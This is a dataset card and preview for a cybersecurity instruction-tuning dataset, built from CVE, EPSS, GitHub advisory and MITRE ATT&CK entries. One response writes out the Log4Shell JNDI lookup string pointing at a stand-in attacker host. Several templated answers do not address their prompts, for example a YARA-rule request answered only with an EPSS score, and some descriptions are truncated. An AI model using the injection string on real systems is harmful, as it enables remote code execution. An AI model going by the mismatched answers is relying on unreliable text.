instruction stringlengths 15 154 | response stringlengths 79 3.82k | source stringclasses 111
values | confidence float64 1 1 |
|---|---|---|---|
Evaluate CVE-2003-0102 exploit risk for vulnerability management. | **CVE-2003-0102**
EPSS: 8.278% | Percentile: 92.1%
Likelihood: Moderate
Source: FIRST.org EPSS | epss_v9 | 1 |
What remediation timeline should I set for CVE-2022-30935? | **CVE-2022-30935**
EPSS: 1.507% | Percentile: 81.0%
Timeline: 30d
Source: FIRST.org | epss_v12 | 1 |
Security advisory for CVE-2017-11539. | **CVE-2017-11539**
EPSS: 0.3800% | Percentile: 59.1%
Risk: LOW
SLA: 90d
Source: FIRST.org | epss_v15 | 1 |
Automated triage decision for CVE-2025-6979. | **CVE-2025-6979**
EPSS: 0.1070% | Percentile: 28.8%
Risk: LOW
Source: FIRST.org | epss_v18 | 1 |
Automated triage decision for CVE-2012-1666. | **CVE-2012-1666**
EPSS: 0.1960% | Percentile: 41.4%
Risk: LOW
Source: FIRST.org | epss_v18 | 1 |
Risk-based patching for CVE-2021-36184. | **CVE-2021-36184**
EPSS: 0.3080% | Percentile: 53.6%
Risk: LOW
Action: Monitor
Source: FIRST.org | epss_v16 | 1 |
Incident preparation for CVE-2025-25514. | **CVE-2025-25514**
EPSS: 0.1020% | Percentile: 27.9%
Risk: LOW
Source: FIRST.org | epss_v18 | 1 |
Calculate risk-based priority for CVE-2006-4217. | **CVE-2006-4217**
EPSS: 1.605% | Percentile: 81.5%
Timeline: 30d
Source: FIRST.org | epss_v12 | 1 |
Blue team response to CVE-2008-1064. | **CVE-2008-1064**
EPSS: 0.2250% | Percentile: 45.0%
Threat Level: LOW
Detection: Monitor for exploitation indicators related to this CVE.
Source: FIRST.org | epss_v17 | 1 |
Patch priority analysis for CVE-2022-29049. | **CVE-2022-29049**
EPSS: 1.280% | Percentile: 79.4%
Priority: MEDIUM
SLA: 30 days
Source: FIRST.org | epss_v13 | 1 |
Risk score calculation for CVE-2022-41242. | **CVE-2022-41242**
EPSS: 0.3960% | Percentile: 60.0%
Risk: LOW
SLA: 90d
Source: FIRST.org | epss_v15 | 1 |
Vulnerability intelligence: CVE-2021-28313. | **CVE-2021-28313**
EPSS: 0.5080% | Percentile: 66.0%
Risk: LOW
SLA: 90d
Source: FIRST.org | epss_v15 | 1 |
Vulnerability triage: CVE-2005-3513. | **CVE-2005-3513**
EPSS: 0.3460% | Percentile: 56.9%
Risk: LOW
Action: Monitor
Source: FIRST.org | epss_v16 | 1 |
Vulnerability intelligence: CVE-2018-3890. | **CVE-2018-3890**
EPSS: 0.4920% | Percentile: 65.3%
Risk: LOW
SLA: 90d
Source: FIRST.org | epss_v15 | 1 |
What mitigations exist for CVE-2010-4198 besides patching? | **Mitigations for CVE-2010-4198** (HIGH, CVSS 8.8)
WebKit, as used in Google Chrome before 7.0.517.44, webkitgtk before 1.2.6, and other products, does not properly handle large text areas, which allows remote attackers to cause a denial of service (memory corruption) or possibly have unspecified other impact via a crafted HTML document.
**Beyond patching:**
1. Network segmentation to limit exposure
2. WAF/IPS rules for known exploitation patterns
3. Disable affected feature/service if non-essential
4. Enhanced monitoring and logging
5. Access control restrictions
Source: NVD | nvd_diverse_v5 | 1 |
Generate a patch priority report for CVE-2013-4862. | **CVE-2013-4862**
EPSS: 7.944% | Percentile: 91.9%
Likelihood: Moderate
Source: FIRST.org EPSS | epss_v9 | 1 |
Analyze exploit risk for CVE-2016-3594 using EPSS data. | **CVE-2016-3594**
EPSS: 1.847% | Percentile: 82.8%
Timeline: 30d
Source: FIRST.org | epss_v12 | 1 |
Patch management decision for CVE-2022-20683. | **CVE-2022-20683**
EPSS: 0.570% | Percentile: 68.3%
Risk: LOW
Action: Backlog
Source: FIRST.org EPSS | epss_v14 | 1 |
Patch management decision for CVE-2013-2178. | **CVE-2013-2178**
EPSS: 0.828% | Percentile: 74.3%
Risk: LOW
Action: Backlog
Source: FIRST.org EPSS | epss_v14 | 1 |
Recommend a monitoring strategy for CVE-2016-3068. | **Monitoring Strategy: CVE-2016-3068** (HIGH, CVSS 8.8)
Mercurial before 3.7.3 allows remote attackers to execute arbitrary code via a crafted git ext:: URL when cloning a subrepository.
**Detection:**
1. Vulnerability scan for affected versions
2. Network signatures for exploitation attempts
3. Log analysis for post-exploitation indicators
4. File integrity monitoring on affected components
Source: NVD | nvd_diverse_v7 | 1 |
What mitigations exist for CVE-2016-1175 besides patching? | **Mitigations for CVE-2016-1175** (MEDIUM, CVSS 4.3)
Cross-site request forgery (CSRF) vulnerability in AQUOS Photo Player HN-PP150 1.02.00.04 through 1.03.01.04 allows remote attackers to hijack the authentication of arbitrary users.
**Beyond patching:**
1. Network segmentation to limit exposure
2. WAF/IPS rules for known exploitation patterns
3. Disable affected feature/service if non-essential
4. Enhanced monitoring and logging
5. Access control restrictions
Source: NVD | nvd_diverse_v5 | 1 |
Generate a vulnerability report for GHSA-rgq9-fqf5-fv58. | **GHSA-rgq9-fqf5-fv58** (CVE-2026-3059)
Severity: CRITICAL | Ecosystem: pip
SGLang's multimodal generation module is vulnerable to unauthenticated remote code execution through the ZMQ broker
SGLang's multimodal generation module is vulnerable to unauthenticated remote code execution through the ZMQ broker, which deserializes untrusted data using pickle.loads() without authentication.
Remediation: Update to patched version. Check vendor advisory. | github_advisory_v3 | 1 |
Assess exploitation risk for CVE-2020-10221 using EPSS. | **CVE-2020-10221** — EPSS Risk Assessment
Exploit Probability: **91.4%** (30-day)
Percentile: 99.7%
Risk Level: HIGH
Source: FIRST.org EPSS | epss_scores_v3 | 1 |
Analyze exploit risk for CVE-2005-1326 using EPSS data. | **CVE-2005-1326**
EPSS: 1.580% | Percentile: 81.4%
Timeline: 30d
Source: FIRST.org | epss_v12 | 1 |
Vulnerability intelligence report: CVE-2022-4234. | **CVE-2022-4234**
EPSS: 0.2110% | Percentile: 43.4%
Threat Level: LOW
Detection: Monitor for exploitation indicators related to this CVE.
Source: FIRST.org | epss_v17 | 1 |
Vulnerability lifecycle tracking: CVE-2026-20068. | **CVE-2026-20068**
EPSS: 0.1030% | Percentile: 28.2%
Risk: LOW
Source: FIRST.org | epss_v18 | 1 |
What is the exploitation probability for CVE-2020-15505? | **CVE-2020-15505** — EPSS Analysis
Exploit Probability: **94.4%** (within 30 days)
Percentile: 100.0% (higher than 100% of all CVEs)
⚠️ HIGH exploitation probability — prioritize patching!
EPSS (Exploit Prediction Scoring System) by FIRST.org provides a data-driven estimate of exploitation likelihood.
Source: https://api.first.org/data/v1/epss?cve=CVE-2020-15505 | epss_scores | 1 |
Incident preparation for CVE-2022-29437. | **CVE-2022-29437**
EPSS: 0.1090% | Percentile: 29.2%
Risk: LOW
Source: FIRST.org | epss_v18 | 1 |
Generate a vulnerability report for GHSA-rvv3-g6hj-g44x. | **GHSA-rvv3-g6hj-g44x** (None)
Severity: HIGH | Ecosystem: nuget
AutoMapper Vulnerable to Denial of Service (DoS) via Uncontrolled Recursion
### Summary
AutoMapper is vulnerable to a Denial of Service (DoS) attack. When mapping deeply nested object graphs, the library uses recursive method calls without enforcing a default maximum depth limit. This allows an attacker to provide a specially crafted object graph that exhausts the thread's
Remediation: Update to patched version. Check vendor advisory. | github_advisory_v3 | 1 |
What remediation timeline should I set for CVE-2004-2510? | **CVE-2004-2510**
EPSS: 1.604% | Percentile: 81.5%
Timeline: 30d
Source: FIRST.org | epss_v12 | 1 |
Security advisory for CVE-2007-1236. | **CVE-2007-1236**
EPSS: 0.3770% | Percentile: 58.9%
Risk: LOW
SLA: 90d
Source: FIRST.org | epss_v15 | 1 |
Write a security advisory for CVE-2016-9402. | **Security Advisory: CVE-2016-9402**
Severity: CRITICAL (CVSS 9.8)
**Summary:** SQL injection vulnerability in the moderation tool in MyBB (aka MyBulletinBoard) before 1.8.7 and MyBB Merge System before 1.8.7 might allow remote attackers to execute arbitrary SQL commands via unspecified vectors.
**Affected:** Check vendor advisory
**Action Required:** Apply patches. If unavailable, implement compensating controls.
**References:** https://nvd.nist.gov/vuln/detail/CVE-2016-9402 | nvd_rephrase_v3 | 1 |
Generate a patch priority report for CVE-2006-6850. | **CVE-2006-6850**
EPSS: 5.926% | Percentile: 90.5%
Likelihood: Moderate
Source: FIRST.org EPSS | epss_v9 | 1 |
Tell me about CVE-2022-37599 affecting webpack. | **CVE-2022-37599** (CVSS 7.5)
Related: webpack
A Regular expression denial of service (ReDoS) flaw was found in Function interpolateName in interpolateName.js in webpack loader-utils 2.0.0 via the resourcePath variable in interpolateName.js.
Source: https://nvd.nist.gov/vuln/detail/CVE-2022-37599 | nvd_infra_keyword | 1 |
Should my team focus on CVE-2017-1000073 this sprint? | **CVE-2017-1000073**
EPSS: 3.269% | Percentile: 87.0%
Priority: P3-Medium
Recommendation: Schedule in next cycle
Source: FIRST.org EPSS | epss_v10 | 1 |
Log analysis indicators for CVE-2020-13617. | **CVE-2020-13617**
EPSS: 0.2520% | Percentile: 48.2%
Threat Level: LOW
Detection: Monitor for exploitation indicators related to this CVE.
Source: FIRST.org | epss_v17 | 1 |
Remediation guidance for CVE-2001-1357. | **CVE-2001-1357**
EPSS: 0.4670% | Percentile: 64.1%
Risk: LOW
SLA: 90d
Source: FIRST.org | epss_v15 | 1 |
Write a YARA hunting rule concept for CVE-2021-25102. | **CVE-2021-25102**
EPSS: 0.2100% | Percentile: 43.3%
Threat Level: LOW
Detection: Monitor for exploitation indicators related to this CVE.
Source: FIRST.org | epss_v17 | 1 |
Vulnerability intelligence: CVE-2006-3071. | **CVE-2006-3071**
EPSS: 0.5270% | Percentile: 66.8%
Risk: LOW
SLA: 90d
Source: FIRST.org | epss_v15 | 1 |
Security operations update: CVE-2013-3032. | **CVE-2013-3032**
EPSS: 0.2660% | Percentile: 49.9%
Risk: LOW
Action: Monitor
Source: FIRST.org | epss_v16 | 1 |
Compliance risk from CVE-2019-15411. | **CVE-2019-15411**
EPSS: 0.1020% | Percentile: 27.9%
Risk: LOW
Source: FIRST.org | epss_v18 | 1 |
How should I prioritize patching CVE-2015-8785? | **CVE-2015-8785** (CVSS 6.2, MEDIUM)
The fuse_fill_write_pages function in fs/fuse/file.c in the Linux kernel before 4.4 allows local users to cause a denial of service (infinite loop) via a writev system call that triggers a zero length for the first segment of an iov.
Patching Priority: MEDIUM
Source: https://nvd.nist.gov/vuln/detail/CVE-2015-8785 | nvd_multi_format | 1 |
Vulnerability prioritization for CVE-2015-9019. | **CVE-2015-9019**
EPSS: 0.595% | Percentile: 69.0%
Risk: LOW
Action: Backlog
Source: FIRST.org EPSS | epss_v14 | 1 |
Security operations update: CVE-2025-10171. | **CVE-2025-10171**
EPSS: 0.2850% | Percentile: 51.7%
Risk: LOW
Action: Monitor
Source: FIRST.org | epss_v16 | 1 |
Explain the MITRE ATT&CK technique T1204.004 (Malicious Copy and Paste). | **T1204.004: Malicious Copy and Paste**
An adversary may rely upon a user copying and pasting code in order to gain execution. Users may be subjected to social engineering to get them to copy and paste code directly into a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059). One such strategy is "ClickFix," in which adversaries present users with seemingly helpful solutions—such as prompts to fix errors or complete CAPTCHAs—that instead instruct the user to copy and paste malicious code.
Malicious websites,
Platforms: Linux, macOS, Windows
| mitre_attack | 1 |
How urgent is CVE-2017-7084? | **CVE-2017-7084** — Urgency: LOW — routine maintenance
CVSS: 3.7 (LOW)
An issue was discovered in certain Apple products. macOS before 10.13 is affected. The issue involves the "Application Firewall" component. It allows remote attackers to bypass intended settings in opportunistic circumstances by leveraging incorrect handling of a denied setting after an upgrade.
Source: NVD | nvd_diverse_v4 | 1 |
Vulnerability lifecycle tracking: CVE-2024-28244. | **CVE-2024-28244**
EPSS: 0.1790% | Percentile: 39.2%
Risk: LOW
Source: FIRST.org | epss_v18 | 1 |
How would a SOC analyst triage CVE-2016-9684? | **SOC Triage: CVE-2016-9684** (CRITICAL, CVSS 9.8)
Priority: P1 - Immediate
The SonicWall Secure Remote Access server (version 8.1.0.2-14sv) is vulnerable to a Remote Command Injection vulnerability in its web administrative interface. This vulnerability occurs in the 'viewcert' CGI (/cgi-bin/viewcert) component responsible for processing SSL certificate information. The CG
**Triage steps:**
1. Check asset inventory — is affected software present?
2. Check CISA KEV — actively exploited?
3. Check EPSS — exploitation probability?
4. Assess exposure — internet-facing?
5. Assign to remediation team
Source: NVD | nvd_soc_format | 1 |
Create a remediation plan for CVE-2002-1924. | **CVE-2002-1924**
EPSS: 0.627% | Percentile: 69.9%
Risk: LOW
Action: Backlog
Source: FIRST.org EPSS | epss_v14 | 1 |
What remediation timeline should I set for CVE-2022-25643? | **CVE-2022-25643**
EPSS: 1.674% | Percentile: 81.9%
Timeline: 30d
Source: FIRST.org | epss_v12 | 1 |
Log analysis indicators for CVE-2018-18553. | **CVE-2018-18553**
EPSS: 0.2400% | Percentile: 47.0%
Threat Level: LOW
Detection: Monitor for exploitation indicators related to this CVE.
Source: FIRST.org | epss_v17 | 1 |
Blue team response to CVE-2020-13352. | **CVE-2020-13352**
EPSS: 0.2370% | Percentile: 46.5%
Threat Level: LOW
Detection: Monitor for exploitation indicators related to this CVE.
Source: FIRST.org | epss_v17 | 1 |
Remediation guidance for CVE-2021-26923. | **CVE-2021-26923**
EPSS: 0.5440% | Percentile: 67.4%
Risk: LOW
SLA: 90d
Source: FIRST.org | epss_v15 | 1 |
Blue team response to CVE-2018-10208. | **CVE-2018-10208**
EPSS: 0.2400% | Percentile: 47.0%
Threat Level: LOW
Detection: Monitor for exploitation indicators related to this CVE.
Source: FIRST.org | epss_v17 | 1 |
Tell me about CVE-2024-4173 affecting kafka. | **CVE-2024-4173** (CVSS 7.6)
Related: kafka
A vulnerability in Brocade SANnav exposes Kafka in the wan interface.
The vulnerability could allow an unauthenticated attacker to perform various attacks, including DOS against the Brocade SANnav.
Source: https://nvd.nist.gov/vuln/detail/CVE-2024-4173 | nvd_infra_keyword | 1 |
Describe CVE-2016-0756 and its impact. | CVE-2016-0756 (MEDIUM, CVSS 5.3): The generate_dialback function in the mod_dialback module in Prosody before 0.9.10 does not properly separate fields when generating dialback keys, which allows remote attackers to spoof XMPP network domains via a crafted stream id and domain name that is included in the target domain as a suffix.
Weaknesses: CWE-20
Recommendation: Review affected components and apply patches during next maintenance window. | nvd_cve_medium | 1 |
Remediation guidance for CVE-2008-6807. | **CVE-2008-6807**
EPSS: 0.4950% | Percentile: 65.4%
Risk: LOW
SLA: 90d
Source: FIRST.org | epss_v15 | 1 |
Vulnerability triage: CVE-2019-5998. | **CVE-2019-5998**
EPSS: 0.3260% | Percentile: 55.2%
Risk: LOW
Action: Monitor
Source: FIRST.org | epss_v16 | 1 |
Evaluate CVE-2018-0923 exploit risk for vulnerability management. | **CVE-2018-0923**
EPSS: 9.924% | Percentile: 92.9%
Likelihood: Moderate
Source: FIRST.org EPSS | epss_v9 | 1 |
What does the EPSS model say about CVE-2020-28038? | **CVE-2020-28038** — EPSS Risk Priority
Exploit Probability: 16.023%
Percentile: 94.7%
Priority: High - schedule within sprint
Source: FIRST.org EPSS | epss_v8 | 1 |
Automated triage decision for CVE-2019-2170. | **CVE-2019-2170**
EPSS: 0.1250% | Percentile: 31.6%
Risk: LOW
Source: FIRST.org | epss_v18 | 1 |
Exploit likelihood of CVE-2009-4989. | **CVE-2009-4989**
EPSS: 1.188% | Percentile: 78.6%
Priority: MEDIUM
SLA: 30 days
Source: FIRST.org | epss_v13 | 1 |
What vulnerability is CVE-2016-0706? | **CVE-2016-0706** (MEDIUM, CVSS 4.3): Apache Tomcat 6.x before 6.0.45, 7.x before 7.0.68, 8.x before 8.0.31, and 9.x before 9.0.0.M2 does not place org.apache.catalina.manager.StatusManagerServlet on the org/apache/catalina/core/RestrictedServlets.properties list, which allows remote authenticated users to bypass intended SecurityManager restrictions and read arbitrary HTTP requests, a
Source: NVD | nvd_rephrase | 1 |
Vulnerability intelligence: CVE-2021-24323. | **CVE-2021-24323**
EPSS: 0.3770% | Percentile: 58.8%
Risk: LOW
SLA: 90d
Source: FIRST.org | epss_v15 | 1 |
Provide EPSS-based vulnerability prioritization for CVE-2018-0806. | **CVE-2018-0806** — EPSS Prioritization
Exploit Probability: 36.40% | Percentile: 97.1%
Priority: P2-High
Source: FIRST.org EPSS | epss_v7 | 1 |
Should CVE-2001-1125 be on my radar? | **CVE-2001-1125** (CRITICAL, CVSS 9.8)
Symantec LiveUpdate before 1.6 does not use cryptography to ensure the integrity of download files, which allows remote attackers to execute arbitrary code via DNS spoofing of the update.symantec.com site.
Yes — Critical severity, immediate attention needed.
Source: NVD | nvd_diverse_v4 | 1 |
Patch priority analysis for CVE-2019-12750. | **CVE-2019-12750**
EPSS: 1.457% | Percentile: 80.6%
Priority: MEDIUM
SLA: 30 days
Source: FIRST.org | epss_v13 | 1 |
Threat assessment: CVE-2006-1295. | **CVE-2006-1295**
EPSS: 0.4270% | Percentile: 62.0%
Risk: LOW
SLA: 90d
Source: FIRST.org | epss_v15 | 1 |
Compliance risk from CVE-2021-3607. | **CVE-2021-3607**
EPSS: 0.1730% | Percentile: 38.4%
Risk: LOW
Source: FIRST.org | epss_v18 | 1 |
Detection engineering for CVE-2022-23054. | **CVE-2022-23054**
EPSS: 0.2400% | Percentile: 47.0%
Threat Level: LOW
Detection: Monitor for exploitation indicators related to this CVE.
Source: FIRST.org | epss_v17 | 1 |
Analyze exploit risk for CVE-2024-26071 using EPSS data. | **CVE-2024-26071**
EPSS: 1.781% | Percentile: 82.5%
Timeline: 30d
Source: FIRST.org | epss_v12 | 1 |
Assess the severity of CVE-2017-2096 and recommend priority level for patching. | Severity Assessment for CVE-2017-2096:
- CVSS Score: 9.8
- Severity: CRITICAL
- Related Weaknesses: CWE-78
IMMEDIATE patching required.
Note: This assessment is based on the CVSS base score. Adjust priority based on your environment's exposure and asset criticality. | nvd_cve | 1 |
How does CVE-2008-7109 affect my infrastructure? | **CVE-2008-7109** (CRITICAL, CVSS 9.8)
The Scanner File Utility (aka listener) in Kyocera Mita (KM) 3.3.0.1 allows remote attackers to bypass authorization and upload arbitrary files to the client system via a modified program that does not prompt the user for a password.
**Impact Assessment:**
- Severity: CRITICAL
- Check if affected software is in your asset inventory
- Prioritize based on exposure and business criticality
Source: NVD | nvd_diverse_qa | 1 |
What remediation steps should I take for CVE-2015-8672? | **CVE-2015-8672** (MEDIUM, CVSS 5.3)
The presentation transmission permission management mechanism in Huawei TE30, TE40, TE50, and TE60 multimedia video conferencing endpoints with software before V100R001C10SPC100 allows remote attackers to cause a denial of service (wired presentation outage) via unspecified vectors involving a wireless presentation.
**Remediation:**
1. Apply vendor patch immediately
2. If no patch: isolate affected systems
3. Monitor for exploitation indicators
4. Check CISA KEV for active exploitation status
Source: NVD | nvd_diverse_qa | 1 |
Create a remediation plan for CVE-2018-3232. | **CVE-2018-3232**
EPSS: 0.786% | Percentile: 73.5%
Risk: LOW
Action: Backlog
Source: FIRST.org EPSS | epss_v14 | 1 |
Threat assessment: CVE-2020-35872. | **CVE-2020-35872**
EPSS: 0.4330% | Percentile: 62.5%
Risk: LOW
SLA: 90d
Source: FIRST.org | epss_v15 | 1 |
Tell me about CVE-2015-4152 affecting elasticsearch. | **CVE-2015-4152** (CVSS 0.0)
Related: elasticsearch
Directory traversal vulnerability in the file output plugin in Elasticsearch Logstash before 1.4.3 allows remote attackers to write to arbitrary files via vectors related to dynamic field references in the path option.
Source: https://nvd.nist.gov/vuln/detail/CVE-2015-4152 | nvd_infra_keyword | 1 |
What remediation timeline should I set for CVE-2025-24993? | **CVE-2025-24993**
EPSS: 1.475% | Percentile: 80.8%
Timeline: 30d
Source: FIRST.org | epss_v12 | 1 |
What is CVE-2016-5066? Provide severity, description, and mitigation advice. | CVE-2016-5066 is a CRITICAL severity vulnerability (CVSS: 9.8).
Description: Sierra Wireless GX 440 devices with ALEOS firmware 4.3.2 have weak passwords for admin, rauser, sconsole, and user.
Weaknesses: CWE-255
Mitigation: Apply vendor patches immediately. Monitor for exploitation indicators. Review affected systems and apply compensating controls. | nvd_cve | 1 |
Threat assessment: CVE-2023-30945. | **CVE-2023-30945**
EPSS: 0.4340% | Percentile: 62.5%
Risk: LOW
SLA: 90d
Source: FIRST.org | epss_v15 | 1 |
Risk score calculation for CVE-2018-16472. | **CVE-2018-16472**
EPSS: 0.5190% | Percentile: 66.5%
Risk: LOW
SLA: 90d
Source: FIRST.org | epss_v15 | 1 |
Security posture assessment for CVE-2006-5751. | **CVE-2006-5751**
EPSS: 0.1010% | Percentile: 27.7%
Risk: LOW
Source: FIRST.org | epss_v18 | 1 |
Evaluate CVE-2006-4993 exploit risk for vulnerability management. | **CVE-2006-4993**
EPSS: 6.509% | Percentile: 91.0%
Likelihood: Moderate
Source: FIRST.org EPSS | epss_v9 | 1 |
Analyze exploit risk for CVE-2007-4213 using EPSS data. | **CVE-2007-4213**
EPSS: 1.832% | Percentile: 82.7%
Timeline: 30d
Source: FIRST.org | epss_v12 | 1 |
Exploit likelihood of CVE-2021-43081. | **CVE-2021-43081**
EPSS: 0.917% | Percentile: 75.7%
Priority: LOW
SLA: 90 days
Source: FIRST.org | epss_v13 | 1 |
Evaluate CVE-2007-2791 exploit risk for vulnerability management. | **CVE-2007-2791**
EPSS: 6.921% | Percentile: 91.3%
Likelihood: Moderate
Source: FIRST.org EPSS | epss_v9 | 1 |
Vulnerability triage: CVE-2021-36747. | **CVE-2021-36747**
EPSS: 0.3680% | Percentile: 58.3%
Risk: LOW
Action: Monitor
Source: FIRST.org | epss_v16 | 1 |
Provide a brief security assessment of CVE-2016-4543. | **Security Assessment: CVE-2016-4543**
CVSS: 9.8 (CRITICAL)
The exif_process_IFD_in_JPEG function in ext/exif/exif.c in PHP before 5.5.35, 5.6.x before 5.6.21, and 7.x before 7.0.6 does not validate IFD sizes, which allows remote attackers to cause a denial of service (out-of-bounds read) or possibly have unspecified other impact via crafted header data.
Risk: CRITICAL — Immediate action required
Source: NVD | nvd_diverse_qa | 1 |
Explain CVE-2016-0184 — a use after free vulnerability. | **CVE-2016-0184** (CVSS 8.8, HIGH)
Type: use after free
Use-after-free vulnerability in GDI in Microsoft Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8.1, Windows Server 2012 Gold and R2, Windows RT 8.1, and Windows 10 Gold and 1511 allows remote attackers to execute arbitrary code via a crafted document, aka "Direct3D Use After Free Vulnerability."
Source: https://nvd.nist.gov/vuln/detail/CVE-2016-0184 | nvd_vuln_type_v2 | 1 |
Security posture assessment for CVE-2016-4884. | **CVE-2016-4884**
EPSS: 0.1170% | Percentile: 30.3%
Risk: LOW
Source: FIRST.org | epss_v18 | 1 |
Vulnerability lifecycle tracking: CVE-2024-10120. | **CVE-2024-10120**
EPSS: 0.1450% | Percentile: 34.5%
Risk: LOW
Source: FIRST.org | epss_v18 | 1 |
Explain CVE-2014-9926 — a use after free vulnerability. | **CVE-2014-9926** (CVSS 7.8, HIGH)
Type: use after free
In GNSS in all Android releases from CAF using the Linux kernel, a Use After Free vulnerability could potentially exist.
Source: https://nvd.nist.gov/vuln/detail/CVE-2014-9926 | nvd_vuln_type_v2 | 1 |
Remediation guidance for CVE-2001-0866. | **CVE-2001-0866**
EPSS: 0.4470% | Percentile: 63.2%
Risk: LOW
SLA: 90d
Source: FIRST.org | epss_v15 | 1 |
Assess the risk of CVE-2015-8268 for an enterprise environment. | Risk Assessment: CVE-2015-8268
- CVSS: 7.5 (HIGH)
- Weaknesses: CWE-200
Schedule patching in next maintenance window.
Consider: asset exposure, compensating controls, exploit availability (check EPSS scores). | nvd_cve_high | 1 |
Security posture assessment for CVE-2019-3718. | **CVE-2019-3718**
EPSS: 0.1560% | Percentile: 36.1%
Risk: LOW
Source: FIRST.org | epss_v18 | 1 |
Generate a patch priority report for CVE-2002-1745. | **CVE-2002-1745**
EPSS: 10.167% | Percentile: 93.0%
Likelihood: High
Source: FIRST.org EPSS | epss_v9 | 1 |
EPSS-based risk assessment: CVE-2013-2878. | **CVE-2013-2878**
EPSS: 0.734% | Percentile: 72.5%
Risk: LOW
Action: Backlog
Source: FIRST.org EPSS | epss_v14 | 1 |
Cyber risk quantification: CVE-2017-16942. | **CVE-2017-16942**
EPSS: 0.2840% | Percentile: 51.5%
Risk: LOW
Action: Monitor
Source: FIRST.org | epss_v16 | 1 |
Provide EPSS-based vulnerability prioritization for CVE-2015-2305. | **CVE-2015-2305** — EPSS Prioritization
Exploit Probability: 31.02% | Percentile: 96.7%
Priority: P2-High
Source: FIRST.org EPSS | epss_v7 | 1 |
What is the exact exploit code for CVE-2021-44228? | While I know that CVE-2021-44228 (Log4Shell) involves JNDI lookup injection in Log4j, I should be transparent about my limitations:
**What I know with HIGH confidence:**
- The vulnerability allows RCE via `${jndi:ldap://attacker/payload}` strings logged by Log4j 2.0-beta9 to 2.14.1
- CVSS 10.0, affects nearly all Java applications using Log4j
- Patched in Log4j 2.17.1+
**What I'm LESS confident about:**
- Specific exploit code details — these change rapidly and vary by target
- I won't provide ready-to-use exploit code
**For exploit details (authorized testing only):**
- Check ExploitDB (https://www.exploit-db.com/)
- GitHub PoC repositories (verify legitimacy)
- Use tools like log4j-scan for authorized testing
⚠️ Using exploit code without authorization is illegal in most jurisdictions. | anti_hallucination_calibration | 1 |
End of preview. Expand in Data Studio
🛡️ Ordinal Security Dataset
Training dataset for Ordinal LLM — a security-specialized language model.
Dataset Description
17,000 instruction/response pairs covering cybersecurity topics. All data sourced from verified public databases (no synthetic data).
Sources
| Source | Count |
|---|---|
| nvd_cve | 4,000 |
| nvd_cve_high | 4,000 |
| github_advisory_expanded | 1,200 |
| nvd_cve_medium | 1,000 |
| nvd_keyword | 850 |
| mitre_attack | 835 |
| mitre_software | 785 |
| capec | 613 |
| github_advisory | 500 |
| nvd_cve_diverse | 500 |
| cisa_kev | 500 |
| nvd_cve_low | 500 |
| capec_defense | 488 |
| anti_hallucination | 444 |
| nvd_cve_followup | 300 |
| mitre_groups | 185 |
| nvd_vuln_type | 150 |
| expert_security_qa | 43 |
| anti_hallucination_refusal | 40 |
| cwe | 20 |
| security_best_practices | 14 |
| dpo_chosen | 12 |
| anti_hallucination_calibration | 7 |
| anti_hallucination_correction | 6 |
| tool_guides | 3 |
| incident_response_qa | 3 |
| anti_hallucination_citation | 2 |
Splits
| Split | Count |
|---|---|
| Train | 16,150 |
| Test | 850 |
Usage
from datasets import load_dataset
dataset = load_dataset("KaztoRay/ordinal-security-dataset")
- Downloads last month
- 4